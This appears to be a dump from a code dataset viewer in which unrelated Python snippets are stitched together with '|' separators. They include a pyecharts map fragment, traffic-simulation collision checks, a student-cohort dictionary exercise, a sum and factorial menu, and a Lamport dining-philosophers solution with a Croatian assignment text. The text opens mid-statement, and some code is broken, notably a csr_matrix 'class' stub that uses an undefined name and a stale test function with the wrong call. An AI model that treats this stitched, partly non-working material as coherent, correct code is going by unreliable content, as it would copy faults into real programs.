map.add('positives',keys,values,visual_range=[0,100],maptype='china'
        ,is_visualmap=True,is_label_show=True,visual_text_color='#000')
map.render('test.html')
'''
with open('./tep.json','a+',encoding='utf-8') as f :
    f.write(json.dumps(result,ensure_ascii=False))
print(result)
'''
|
from collections import deque
import random
class ReplayBuffer(object):
    """Fixed-capacity FIFO store of transitions with uniform random sampling."""

    def __init__(self, buffer_size):
        self.buffer_size = buffer_size  # maximum number of stored experiences
        self.num_experiences = 0        # current fill level
        self.buffer = deque()

    def getBatch(self, batch_size):
        """Sample without replacement; returns everything when under-filled."""
        count = min(batch_size, self.num_experiences)
        return random.sample(self.buffer, count)

    def add(self, obs, action, reward, new_obs, matrix, next_matrix, done):
        """Append one transition, evicting the oldest once at capacity."""
        experience = (obs, action, reward, new_obs, matrix, next_matrix, done)
        if self.num_experiences >= self.buffer_size:
            self.buffer.popleft()
        else:
            self.num_experiences += 1
        self.buffer.append(experience)
# check tooCloseToCarInFront
def isTooCloseToCarInFront(carLineArray, c):
    """True when a car in c's lane is less than 50 units behind/ahead of c.

    Each row is [lane, car, ...]; assumes larger x = further along the
    road — TODO confirm direction convention with the caller.
    """
    return any(row[0] == c.line and 0 < c.x - row[1].x < 50
               for row in carLineArray)
# check collision 4line
def isCarCollided(carLineArray, c):
    """Collision test for the 4-lane road.

    A same-lane car within 35 units collides; rows whose third element is
    truthy use a wider 60-unit threshold (larger vehicle, presumably —
    TODO confirm the flag's meaning).
    """
    for row in carLineArray:
        if row[0] != c.line:
            continue
        gap = c.x - row[1].x
        if 0 < gap < 35:
            return True
        if row[2] and 0 < gap < 60:
            return True
    return False
# check collision left road
def line56IsCarCollided(carLineArray, c):
    """Collision test for lanes 5/6 (left road): within 40 units along x
    AND within 5 units vertically of a same-lane car."""
    for row in carLineArray:
        if row[0] != c.line:
            continue
        if 0 < c.x - row[1].x < 40 and -5 < c.y - row[1].y < 5:
            return True
    return False
def pedLightIsWalking(pedArray, pedStart0YAry):
    """True while any pedestrian is still mid-crossing.

    pedStart0YAry holds the two crossing endpoints [start0_y, start1_y];
    pedStartNum says which end the pedestrian started from.
    """
    end_a, end_b = pedStart0YAry[0], pedStart0YAry[1]
    for ped in pedArray:
        if ped.pedStartNum == 1 and ped.y <= end_a and ped.y != end_b:
            return True
        if ped.pedStartNum == 0 and ped.y >= end_b and ped.y != end_a:
            return True
    return False
|
# Visual separator reused in the exercise printouts below.
line_break = "-----------------------------------------------------------------------------------"
# Cohort name -> enrolled student count.
students = {
    'cohort1': 34,
    'cohort2': 42,
    'cohort3': 22
}
# function - display name and number of each student
def display_name_and_num(dict_name):
    """Print "<cohort>: <count> students" for every entry in dict_name."""
    for student in dict_name:
        number = dict_name[student]
        print(f'{student}: {number} students')
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.3 -
# -----------------------------------------------------------------------------------
# add 'cohort4' : 43 to students
students['cohort4'] = 43
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.4 -
# -----------------------------------------------------------------------------------
# display names from students dictionary
def display_name(dict_name):
    """Print every name in the given iterable, one per line."""
    for entry in list(dict_name):
        print(entry)
# output all the cohort names
display_name(students.keys())
# -----------------------------------------------------------------------------------
# 10.5 -
# -----------------------------------------------------------------------------------
def expand_class(class_list):
    """Preview a 5% enrollment increase per cohort (prints only; the
    dictionary itself is not mutated)."""
    for student, number in class_list.items():
        grown = number + number * 0.05
        print(student, grown)
# display results
# expand_class(students)
# -----------------------------------------------------------------------------------
# 10.6 -
# ----------------------------------------------------------------------------------- e
# Delete the 2nd cohort and redisplay the dictionary.
# students.pop('cohort2')
# display_name_and_num(students)
# -----------------------------------------------------------------------------------
# 10.7 -
# -----------------------------------------------------------------------------------
# get the total number of students in all cohorts using a for loop
def get_total_students(dict_name):
    """Return the total number of students across all cohorts.

    BUG FIX: the original did `number += number` and returned from inside
    the loop, so it produced double one cohort's count instead of the sum
    (and crashed-by-omission on an empty dict).

    :param dict_name: mapping of cohort name -> student count
    :return: sum of all counts (0 for an empty mapping)
    """
    total = 0
    for number in dict_name.values():
        total += number
    return total
print("The total number of students is: {} ".format(get_total_students(students)))
|
#Sum and Product
def calculate_sum(number:int):
    """Sum of 1..n via the Gauss closed form n*(n+1)/2."""
    n = int(number)
    return int(n * (n + 1) / 2)
def calculate_product(number:int):
    """Product of 1..n (n factorial; returns 1 for n <= 0 — empty loop)."""
    product = 1
    for factor in range(1, number + 1):
        product *= factor
    return product
def menu():
    """Print the three menu options."""
    for option in ("1: Compute the sum of 1..n",
                   "2: Compute the product of 1..n",
                   "9: Quit"):
        print(option)
def get_choice() -> int:
    """Read the menu selection from stdin; None when it is not an integer."""
    raw = input("Choice: ")
    try:
        return int(raw)
    except ValueError:
        return None
def number() -> int:
    """Prompt for n; return it as an int, or None on invalid input.

    Fixes: removed the unreachable `print(number)` that sat after the
    return, and narrowed the bare `except:` (which also swallowed
    KeyboardInterrupt/EOFError) to ValueError.
    """
    try:
        return int(input("Enter value for n: "))
    except ValueError:
        return None
# Driver code: loop the menu until the user quits with choice 9.
choice = 0
while choice != 9:
    menu()
    choice = get_choice()
    if choice is None:  # fixed: identity check instead of '== None'
        continue
    elif choice == 9:
        continue
    elif choice == 1:
        number_n = number()
        if number_n is None:
            continue
        print(f"The result is: {calculate_sum(number_n)}")
    elif choice == 2:
        number_n = number()
        if number_n is None:
            continue
        print(f"The result is: {calculate_product(number_n)}")
# NOTE(review): this mirrors the scipy.sparse.csr_matrix constructor
# signature as copied documentation; `arg1` is undefined here, so this
# statement raises NameError at import time — it is not runnable code.
# TODO: confirm intent (reference note vs. stub to implement).
class csr_matrix(arg1, shape=None, dtype=None, copy=False): # scipy.sparse.csr_matrix
    '''
    Compressed Sparse Row matrix (signature reference).
    '''
|
"""
Problem pet filozofa
Problem pet filozofa. Filozofi obavljaju samo dvije različite aktivnosti: misle ili jedu.
To rade na poseban način. Na jednom okruglom stolu nalazi se pet tanjura te pet
štapića (između svaka dva tanjura po jedan). Filozof prilazi stolu, uzima lijevi štapić,
pa desni te jede. Zatim vraća štapiće na stol i odlazi misliti.
Ako rad filozofa predstavimo jednim zadatkom onda se on može opisati na sljedeći način:
filozof i
ponavljati
misliti;
jesti;
do zauvijek;
Slika 1. Pseudokod zadatka kojeg obavlja proces filozof
Zadatak
Potrebno je pravilno sinkronizirati rad pet procesa filozofa koristeći:
- Lamportov raspodijeljeni protokol (rješavaju studenti čija je predzadnja znamenka JMBAG parna) ili
Svi procesi ispisuju poruku koju šalju i poruku koju primaju.
Sve što u zadatku nije zadano, riješiti na proizvoljan način.
"""
from typing import Optional, Any
'''
Algorithm
Requesting process
Pushing its request in its own queue (ordered by time stamps)
Sending a request to every node.
Waiting for replies from all other nodes.
If own request is at the head of its queue and all replies have been received, enter critical section.
Upon exiting the critical section, remove its request from the queue and send a release message to every process.
Other processes
After receiving a request, pushing the request in its own request queue (ordered by time stamps) and reply with a time stamp.
After receiving release message, remove the corresponding request from its own request queue.
'''
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from itertools import combinations
from random import shuffle, randint
from queue import PriorityQueue, Queue
from heapq import heappush, heappop
from time import time, sleep
class PeekyQueue(PriorityQueue):
    """PriorityQueue extended with peek() and remove().

    Both helpers are built on get()/put(), so they are only safe while no
    other thread is consuming the queue concurrently.
    """

    def peek(self):
        """Return the smallest element without permanently removing it."""
        smallest = self.get()
        self.put(smallest)
        return smallest

    def remove(self, item):
        """Delete one occurrence of item (ValueError if it is absent)."""
        drained = []
        while not self.empty():
            drained.append(self.get())
        drained.remove(item)
        for leftover in drained:
            self.put(leftover)
class IndexedConnection(Connection):
    """
    Wrapper tagging a multiprocessing Connection with a peer id so pipes
    can be addressed/filtered by philosopher index.

    NOTE(review): subclasses Connection but never calls super().__init__;
    everything works purely by delegation to the wrapped `connection`.
    Presumably the subclassing only exists so the object passes interface
    expectations — confirm before relying on isinstance checks.
    """
    def __init__(self, connection, id) -> None:
        self.connection = connection  # the real Pipe endpoint
        self.id = id                  # index of the peer this pipe reaches
    def close(self) -> None:
        self.connection.close()
    def fileno(self) -> int:
        return self.connection.fileno()
    def poll(self, timeout: Optional[float] = ...) -> bool:
        return self.connection.poll(timeout)
    def recv(self) -> Any:
        return self.connection.recv()
    def recv_bytes(self, maxlength: Optional[int] = ...) -> bytes:
        return self.connection.recv_bytes(maxlength)
    def recv_bytes_into(self, buf: Any, offset: int = ...) -> int:
        return self.connection.recv_bytes_into(buf, offset)
    def send(self, obj: Any) -> None:
        self.connection.send(obj)
    def send_bytes(self, buf: bytes, offset: int = ..., size: Optional[int] = ...) -> None:
        self.connection.send_bytes(buf, offset, size)
class Type(object):
    """Message type codes for the Lamport mutual-exclusion protocol."""
    request = 1
    response = 2
    exit = 3
    release = 4

    # Code -> human-readable name, used by decode().
    _NAMES = {1: "request", 2: "response", 3: "exit", 4: "release"}

    @staticmethod
    def decode(index):
        """Readable name for a type code ('unknown' if unrecognized)."""
        return Type._NAMES.get(index, "unknown")
N = 5  # number of philosophers
start = time()  # wall-clock reference captured at import time
time_to_run = 1000  # s — how long each philosopher keeps looping
class Message(object):
    """Protocol message: (kind, sender id, Lamport clock, resource id)."""

    def __init__(self, type, id, timestamp, target_id) -> None:
        super().__init__()
        self.type = type
        self.id = id
        self.timestamp = timestamp
        self.target_id = target_id

    def __repr__(self) -> str:
        return f"Type: {Type.decode(self.type)}, Id: {self.id}, Clock: {self.timestamp}, Target: {self.target_id}"

    def __eq__(self, other):
        # Equality deliberately ignores the clock: same sender, same kind,
        # same resource.
        return (self.id, self.type, self.target_id) == (other.id, other.type, other.target_id)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __lt__(self, other):
        # Lamport total order: clock first, sender id breaks ties.
        if self.timestamp == other.timestamp:
            return self.id < other.id
        return self.timestamp < other.timestamp
def request_resource(message: Message, my_id: int, read_pipe: Connection, write_pipes: [Connection],
                     r_qs: {int: PeekyQueue}, timestamp):
    """
    Lamport distributed mutual exclusion: acquire resource message.target_id.

    Queues the request locally, broadcasts it to all peers, then services
    incoming traffic until (a) every peer has replied and (b) our request
    sits at the head of the resource's queue. Returns the updated clock.

    NOTE(review): the += 1 below bumps only the local clock copy AFTER
    `message` was built by the caller, so the broadcast carries the
    pre-increment timestamp — confirm that is intended.
    """
    timestamp += 1
    r_q = r_qs[message.target_id]
    r_q.put(message)
    # Broadcast the request to every peer.
    for pipe in write_pipes:
        pipe.send(message)
        print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(message), pipe.id), flush=True)
    responded = 0
    N = len(write_pipes) + 1
    # print(N, flush=True)
    # Spin: handle messages until all replies arrived AND we are the head.
    while not (responded >= N - 1 and r_q.peek() == message):
        if responded == N - 1:
            # print(r_q.peek(), message, r_q.peek() == message, flush=True)
            # r_q_p = []
            # while not r_q.empty():
            #     r_q_p.append(r_q.get())
            # for r in r_q_p:
            #     r_q.put(r)
            # print([e for e in r_q_p], r_q.peek(), flush=True)
            # print([i for i in len(r_q.queue)], r_q.peek(), flush=True)
            pass
        response = read_pipe.recv()
        print("Philosopher(%d) reading message: (%s)" % (my_id, str(response)), flush=True)
        if response.type == Type.request:
            # Lamport clock merge, enqueue the peer's request, then ack it.
            timestamp = max(timestamp, response.timestamp) + 1
            r_qs[response.target_id].put(response)
            new_msg = Message(Type.response, my_id, timestamp, response.target_id)
            print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(new_msg), response.id), flush=True)
            list(filter(lambda pipe: pipe.id == response.id, write_pipes))[0].send(new_msg)
        elif response.type == Type.response:
            responded += 1
        elif response.type == Type.release:
            # timestamp = max(timestamp, response.timestamp) + 1
            # Drop the releasing peer's request from the matching queue.
            r_qs[response.target_id].remove(Message(Type.request, response.id, response.timestamp, response.target_id))
    # print(r_q.peek(), message, r_q.peek() == message, r_q.peek() == message, flush=True)
    # r_q_p = []
    # while not r_q.empty():
    #     r_q_p.append(r_q.get())
    # for r in r_q_p:
    #     r_q.put(r)
    # print([e for e in r_q_p], r_q.peek(), message, flush=True)
    # r_q.remove(message)
    return timestamp
def release_resource(message: Message, my_id: int, read_pipe: Connection, write_pipes: [Connection],
                     r_qs: {int: PeekyQueue}):
    """Drop our own request from the resource queue and broadcast a release."""
    r_qs[message.target_id].remove(message)
    release_message = Message(Type.release, my_id, message.timestamp, message.target_id)
    for pipe in write_pipes:
        pipe.send(release_message)
        print("Philosopher(%d) sending message: (%s) to %d" % (my_id, str(release_message), pipe.id), flush=True)
def philosopher(id, read_pipe, write_pipes):
    """
    One philosopher process: repeatedly acquire the shared "table"
    resource (id -1) via Lamport mutual exclusion, eat (logged to
    eats-<id>.txt), then release, until time_to_run elapses.

    :param id: philosopher index (0..N-1)
    :param read_pipe: this process's inbound connection
    :param write_pipes: IndexedConnection list to the peers it talks to
    """
    my_id = id
    print("Philosopher(%d) started" % (my_id,), flush=True)
    # pq = PeekyQueue()
    # r_qs = {i: pq for i in range(-1, N)}
    # One request queue per resource; -1 is the shared table.
    r_qs = {i: PeekyQueue() for i in range(-1, N)}
    # Random initial Lamport clock.
    timestamp = randint(0, 5)
    while time() - start < time_to_run:
        # print("before", id, timestamp)
        # message_left = Message(Type.request, my_id, timestamp, (my_id - 1) % N)
        # timestamp = request_resource(message_left, my_id, read_pipe, write_pipes, r_qs, timestamp)
        # print("Philosopher(%d) got %d at %d" % (my_id, message_left.target_id, time()), flush=True)
        # print("mid", id, timestamp)
        # message_right = Message(Type.request, my_id, timestamp, my_id % N)
        # timestamp = request_resource(message_right, my_id, read_pipe, write_pipes, r_qs, timestamp)
        # print("Philosopher(%d) got %d at %d" % (my_id, message_right.target_id, time()), flush=True)
        # print("after", id, timestamp)
        message_table = Message(Type.request, my_id, timestamp, -1)
        timestamp = request_resource(message_table, my_id, read_pipe, write_pipes, r_qs, timestamp) # approach table
        print("Philosopher(%d) got %d at %d" % (my_id, message_table.target_id, time()), flush=True)
        # ~1 s "eating" period, logged with a wall-clock timestamp.
        from random import gauss
        sleep(gauss(1, 0.01))
        f = open('eats-%d.txt' % id, mode='a+')
        msg = ['Philosopher(%d) eating %f\n' % (my_id, time())]
        print(msg, flush=True)
        f.writelines(msg)
        f.close()
        sleep(gauss(1, 0.01))
        print("Philosopher(%d) releasing %d at %d" % (my_id, message_table.target_id, time()), flush=True)
        release_resource(message_table, my_id, read_pipe, write_pipes, r_qs)
        #
        # release_resource(message_right, my_id, read_pipe, write_pipes, r_qs)
        # release_resource(message_left, my_id, read_pipe, write_pipes, r_qs)
    print("Philosopher(%d) finished" % (my_id,), flush=True)
def main():
    """
    Wire up N philosopher processes over pipes and run them to completion.

    Each philosopher i reads from its own pipe's receiving end and writes
    to the sending ends of its two ring neighbours ((i±1) % N).
    NOTE(review): request_resource waits for replies from every pipe in
    write_pipes, so correctness depends on this neighbour-only topology
    matching the protocol's quorum assumption — confirm.
    """
    # pipes = {}
    # for i, j in combinations(range(N), 2):
    #     pipes[(i, j)] = Pipe()
    pipes = [Pipe() for i in range(N)]
    processes = []
    for i in range(N):
        # Truncate this philosopher's eat log from any previous run.
        f = open('eats-%d.txt' % i, mode='w+')
        f.close()
        p = Process(target=philosopher, args=(
            i,
            [IndexedConnection(pipe[0], id) for id, pipe in enumerate(pipes) if id == i][0],
            [IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id == (i + 1) % N or id == (i - 1) % N],
            # [IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id == (i + 1) % N or id == (i - 1) % N or id == (i + 2) % N or id == (i - 2) % N],
            # [IndexedConnection(pipe[1], id) for id, pipe in enumerate(pipes) if id != i],
        ))
        processes.append(p)
    # Start the philosophers in random order, slightly staggered.
    order = [i for i in range(N)]
    shuffle(order)
    print(order, flush=True)
    for i in order:
        processes[i].start()
        sleep(0.1)
    for p in processes:
        p.join()
    print("Finished", flush=True)
def test():
    """
    Ad-hoc smoke test for pipe messaging.

    NOTE(review): philosopher() takes (id, read_pipe, write_pipes) but is
    invoked here with a single argument — this helper is stale and raises
    TypeError if run. Kept as-is; confirm before using it.
    """
    pipeout, pipein = Pipe()
    p = Process(target=philosopher, args=(pipeout,))
    p.start()
    print('Sending message to pipe', flush=True)
    pipein.send([42, None, 'text'])
    p.join()
    pipein.close()
    print('Closed writing pipe', flush=True)
def merge():
    """Merge the per-philosopher eat logs into one stream ordered by the
    float timestamp embedded in each line.

    Improvements: raw string for the regex (avoids the invalid '\\d'
    escape warning) and `with open` so file handles are always closed
    (the original leaked them).
    """
    import re
    reg = re.compile(r'\d+\.\d+')
    pq = PeekyQueue()
    for name in ['eats-%d.txt' % i for i in range(N)]:
        with open(name, 'r+') as f:
            for line in f.readlines():
                line = line.strip()
                # First float on the line is the eat timestamp; note the
                # ordering key stays a *string*, matching prior behavior.
                value = reg.findall(line)[0]
                pq.put((value, line))
    while not pq.empty():
        print(pq.get()[1], flush=True)
if __name__ == '__main__':
    # main()  # run the simulation; currently only merging existing logs
    merge()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.